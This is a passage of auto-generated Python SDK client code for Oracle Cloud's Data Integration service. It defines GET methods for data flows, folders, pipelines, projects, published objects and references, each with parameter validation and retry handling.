This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlow`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_flow.py.html>`__ to see an example of how to use get_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows/{dataFlowKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowKey": data_flow_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlow")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlow")
def get_data_flow_validation(self, workspace_id, data_flow_validation_key, **kwargs):
"""
Retrieves a data flow validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_validation_key: (required)
The key of the dataflow validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_flow_validation.py.html>`__ to see an example of how to use get_data_flow_validation API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations/{dataFlowValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_flow_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowValidationKey": data_flow_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataFlowValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataFlowValidation")
def get_dependent_object(self, workspace_id, application_key, dependent_object_key, **kwargs):
"""
Retrieves the details of a dependent object from an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str dependent_object_key: (required)
The dependent object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DependentObject`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_dependent_object.py.html>`__ to see an example of how to use get_dependent_object API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/dependentObjects/{dependentObjectKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_dependent_object got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"dependentObjectKey": dependent_object_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DependentObject")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DependentObject")
def get_external_publication(self, workspace_id, task_key, external_publications_key, **kwargs):
"""
Retrieves a publshed object in an task using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publications_key: (required)
The external published object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_external_publication.py.html>`__ to see an example of how to use get_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications/{externalPublicationsKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationsKey": external_publications_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublication")
def get_external_publication_validation(self, workspace_id, task_key, external_publication_validation_key, **kwargs):
"""
Retrieves an external publication validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publication_validation_key: (required)
The external published object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_external_publication_validation.py.html>`__ to see an example of how to use get_external_publication_validation API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations/{externalPublicationValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_external_publication_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationValidationKey": external_publication_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublicationValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublicationValidation")
def get_folder(self, workspace_id, folder_key, **kwargs):
"""
Retrieves a folder using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str folder_key: (required)
The folder key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] projection: (optional)
This parameter allows users to specify which view of the object to return. CHILD_COUNT_STATISTICS - This option is used to get statistics on immediate children of the object by their type.
Allowed values are: "CHILD_COUNT_STATISTICS"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Folder`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_folder.py.html>`__ to see an example of how to use get_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders/{folderKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"projection"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"folderKey": folder_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'projection' in kwargs:
projection_allowed_values = ["CHILD_COUNT_STATISTICS"]
for projection_item in kwargs['projection']:
if projection_item not in projection_allowed_values:
raise ValueError(
"Invalid value for `projection`, must be one of {0}".format(projection_allowed_values)
)
query_params = {
"projection": self.base_client.generate_collection_format_param(kwargs.get("projection", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Folder")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Folder")
def get_patch(self, workspace_id, application_key, patch_key, **kwargs):
"""
Retrieves a patch in an application using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str patch_key: (required)
The patch key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Patch`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_patch.py.html>`__ to see an example of how to use get_patch API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches/{patchKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_patch got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"patchKey": patch_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Patch")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Patch")
def get_pipeline(self, workspace_id, pipeline_key, **kwargs):
"""
Retrieves a pipeline using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_key: (required)
The pipeline key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If value is true, then all referenced objects are expanded. If value is false, then shallow objects are returned in place of references. Default is false. <br><br><B>Example:</B><br> <ul> <li><B>?expandReferences=true</B> returns all objects of type data loader task</li> </ul>
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Pipeline`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_pipeline.py.html>`__ to see an example of how to use get_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines/{pipelineKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineKey": pipeline_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Pipeline")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Pipeline")
def get_pipeline_validation(self, workspace_id, pipeline_validation_key, **kwargs):
"""
Retrieves a pipeline validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_validation_key: (required)
The key of the pipeline validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_pipeline_validation.py.html>`__ to see an example of how to use get_pipeline_validation API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations/{pipelineValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_pipeline_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineValidationKey": pipeline_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PipelineValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PipelineValidation")
def get_project(self, workspace_id, project_key, **kwargs):
"""
Retrieves a project using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str project_key: (required)
The project key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] projection: (optional)
This parameter allows users to specify which view of the object to return. CHILD_COUNT_STATISTICS - This option is used to get statistics on immediate children of the object by their type.
Allowed values are: "CHILD_COUNT_STATISTICS"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_project.py.html>`__ to see an example of how to use get_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects/{projectKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"projection"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"projectKey": project_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'projection' in kwargs:
projection_allowed_values = ["CHILD_COUNT_STATISTICS"]
for projection_item in kwargs['projection']:
if projection_item not in projection_allowed_values:
raise ValueError(
"Invalid value for `projection`, must be one of {0}".format(projection_allowed_values)
)
query_params = {
"projection": self.base_client.generate_collection_format_param(kwargs.get("projection", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Project")
def get_published_object(self, workspace_id, application_key, published_object_key, **kwargs):
"""
Retrieves the details of a published object from an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str published_object_key: (required)
The published object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If value is true, then all referenced objects are expanded. If value is false, then shallow objects are returned in place of references. Default is false. <br><br><B>Example:</B><br> <ul> <li><B>?expandReferences=true</B> returns all objects of type data loader task</li> </ul>
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PublishedObject`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_published_object.py.html>`__ to see an example of how to use get_published_object API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/publishedObjects/{publishedObjectKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_published_object got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"publishedObjectKey": published_object_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObject")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObject")
def get_reference(self, workspace_id, application_key, reference_key, **kwargs):
"""
Retrieves a reference in an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str reference_key: (required)
The reference key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Reference`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_reference.py.html>`__ to see an example of how to use get_reference API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/references/{referenceKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_reference got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"referenceKey": reference_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
